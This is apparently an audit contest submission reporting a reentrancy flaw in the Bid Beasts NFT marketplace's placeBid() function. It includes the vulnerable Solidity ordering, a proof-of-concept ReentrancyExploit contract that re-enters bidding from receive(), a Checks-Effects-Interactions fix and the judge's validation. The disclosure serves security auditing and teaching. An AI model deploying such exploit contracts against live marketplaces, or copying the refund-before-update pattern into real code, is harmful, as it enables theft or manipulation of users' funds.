Bid Beasts
First Flight #49
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

### [M-1]: Reentrancy Vulnerability in `placeBid()` Function

xylem56

[M-1]: Reentrancy Vulnerability in placeBid() Function

Severity: Medium
Impact: Auction Manipulation
Likelihood: Medium

Description:
The placeBid() function performs external calls to refund previous bidders before updating the bid state, creating a reentrancy opportunity.

Vulnerable Code:

function placeBid(uint256 tokenId) external payable isListed(tokenId) {
// ...
if (previousBidder != address(0)) {
_payout(previousBidder, previousBidAmount); // External call first
}
bids[tokenId] = Bid(msg.sender, msg.value); // State change after
// ...
}

Attack Scenario:

  1. Attacker places initial bid

  2. Legitimate user places higher bid

  3. During refund, attacker's receive() function reenters placeBid()

  4. Attacker can potentially manipulate auction state or timing

Proof of Concept:

contract ReentrancyExploit {
BidBeastsNFTMarketplace marketplace;
uint256 targetTokenId;
bool attacking;
constructor(address _marketplace) {
marketplace = BidBeastsNFTMarketplace(_marketplace);
}
function setupAttack(uint256 tokenId) external payable {
targetTokenId = tokenId;
// Place initial bid
marketplace.placeBid{value: msg.value}(tokenId);
}
function attack() external payable {
attacking = true;
// This will trigger our receive() during refund
marketplace.placeBid{value: msg.value}(targetTokenId);
}
receive() external payable {
if (attacking) {
attacking = false;
// Reenter during refund process
// State is inconsistent: old bid still recorded but new bid being processed
// Potential manipulations:
// - Check auction timing
// - Query bid state (may see inconsistent data)
// - Attempt additional bids while state is inconsistent
// Example: Try to place another bid while in inconsistent state
if (address(this).balance > 0.01 ether) {
try marketplace.placeBid{value: 0.01 ether}(targetTokenId) {
// If successful, we've manipulated the auction
} catch {
// Expected to fail, but state was still inconsistent
}
}
}
}
}

Attack Vector:

  1. Attacker places initial bid

  2. Legitimate user places higher bid

  3. During _payout() to attacker, receive() function executes

  4. Attacker can query contract state before bids[tokenId] is updated

  5. Potential for state manipulation or information extraction

Recommended Mitigation:

  • Use OpenZeppelin's ReentrancyGuard

  • OR move state updates before external calls (Checks-Effects-Interactions pattern)

// Update state first
bids[tokenId] = Bid(msg.sender, msg.value);
// Then make external calls
if (previousBidder != address(0)) {
_payout(previousBidder, previousBidAmount);
}
Updates

Lead Judging Commences

cryptoghost Lead Judge 2 months ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeast Marketplace: Reentrancy In PlaceBid

BidBeast Marketplace has a Medium-severity reentrancy vulnerability in its "buy-now" feature that allows an attacker to disrupt the platform by blocking sales or inflating gas fees for legitimate users.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!